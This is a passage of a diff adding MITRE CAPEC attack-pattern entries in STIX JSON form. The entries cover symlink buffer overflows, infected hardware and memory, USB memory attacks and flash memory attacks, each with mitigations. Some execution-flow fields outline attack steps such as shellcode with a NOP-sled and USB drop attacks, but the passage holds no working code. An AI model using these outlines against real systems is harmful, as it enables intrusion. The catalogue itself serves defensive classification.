"modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB Stick", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. 
When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.", + "external_references": [ + { + "external_id": "CAPEC-45", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/45.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The EFTP server has a buffer overflow that can be exploited if an adversary uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the adversary uploads some content (the link file) and then the adversary causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program that might load in certain files to memory.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified.
  3. Craft overflow file content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary can create symbolic link on the target host.", + "The target host does not perform correct boundary checking while consuming data from a resources." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.", + "id": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecde6069-c1c7-4e95-bfbf-8d888d1da15e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c08d081e-5bc2-4eeb-bef2-5280baed888e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the resource pointed to by your symlink links (See attack pattern named \"Forced Symlink race\"), they can be replaced by malicious resources.", + "id": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d781109-18f4-4057-a1b2-2d53e821b317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always check the size of the input data before copying to a buffer.", + "id": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7487759c-c682-45d9-b902-871361800f52", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9762e554-038f-4527-b000-3e8e0d78fe26", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ce42f28-5f2d-4b83-8daf-869c4145268e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71106318-5e06-4db7-b209-bbf30b0020fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--84ae2ea4-df85-4853-b1f2-319992648876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. 
Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-451", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--64076ab3-d972-4688-b46b-76627923a8a0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via Infected Peripheral Device", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. 
This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-452", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/452.html" + } + ], + "id": "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4" + ], + "x_capec_prerequisites": [ + "Access to the hardware currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. 
Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-453", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/453.html" + } + ], + "id": "attack-pattern--a2eaa5c4-8d21-414a-9d49-08667f4c6427", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-454", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/454.html" + } + ], + "id": "attack-pattern--c18bf62a-4419-4606-9dbe-03ab63873b60", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Modification of Existing Components with Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-457 : Malicious Logic Insertion into Product Hardware. 
Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-455", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/455.html" + } + ], + "id": "attack-pattern--55c6c2d2-1850-4263-97eb-e47c9b9a7a4b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Inclusion of Counterfeit Hardware Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. 
This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-456", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/456.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + } + ], + "id": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Memory", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.", + "In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords." 
+ ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect stop operations with known virus.", + "id": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-456-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66815cc1-00b2-4e7e-b397-ae5fb384441e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "spec_version": "2.1", + "target_ref": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. 
Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.", + "external_references": [ + { + "external_id": "CAPEC-457", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/457.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + }, + { + "description": "Replication Through Removable Media", + "external_id": "T1091", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1091" + }, + { + "description": "Communication Through Removable Media", + "external_id": "T1092", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1092" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + } + ], + "id": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "USB Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + 
"type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target System: In certain cases, the adversary will explore an organization's network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.

  2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Experiment

  1. Develop or Obtain malware and install on a USB device: The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.

  2. Techniques
    The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes.

Exploit

  1. Connect or deceive a user into connecting the infected USB device: Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.

  2. Techniques
    The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of physical access to the device being attacked.", + "Information pertaining to the target organization on how to best execute a USB Drop Attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.", + "id": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1223d74f-6652-40ea-92ee-4f1a2c91d676", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "spec_version": "2.1", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. 
Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.", + "id": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83689bae-01f6-4ed3-b3f8-66cf8e657475", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not connect untrusted USB devices to systems connected on an organizational network. 
Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist.", + "id": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dfbd2aef-9f4e-43aa-819c-14c5b16d3c23", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "spec_version": "2.1", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. 
Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device.", + "external_references": [ + { + "external_id": "CAPEC-458", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/458.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Robert Lemos, Researchers: Rootkits headed for BIOS, 2006, SecurityFocus", + "external_id": "REF-394", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Flash Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. 
